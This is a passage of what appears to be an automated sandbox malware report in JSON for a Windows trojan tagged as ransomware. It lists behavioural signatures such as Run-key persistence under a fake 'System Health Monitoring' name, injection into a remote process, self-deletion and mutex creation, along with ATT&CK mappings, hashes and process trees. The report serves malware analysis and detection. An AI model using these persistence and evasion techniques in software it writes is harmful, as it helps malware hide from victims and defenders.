"type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf
https://hybrid-analysis.com/sample/73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf
Hybrid Analysis - Ransomware
{"size": 606084, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf", "sha256": "73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 138, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606088, "sha256": "ee7c8039e50aa01f05ac670fd3df9debda6c9756786c6b23d5a31b643af564cf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe (PID: 2964)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002964", "name": "73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe", "normalized_path": "C:\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe", "sha256": "73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf", "av_label": "Trojan.Generic", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00002372", "parentuid": "00000000-00002964", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe *", "sha256": "ee7c8039e50aa01f05ac670fd3df9debda6c9756786c6b23d5a31b643af564cf"}, {"uid": "00000000-00004792", "parentuid": "00000000-00002372", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZXWSXG", "sha256": "ee7c8039e50aa01f05ac670fd3df9debda6c9756786c6b23d5a31b643af564cf"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002964)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004792)\n 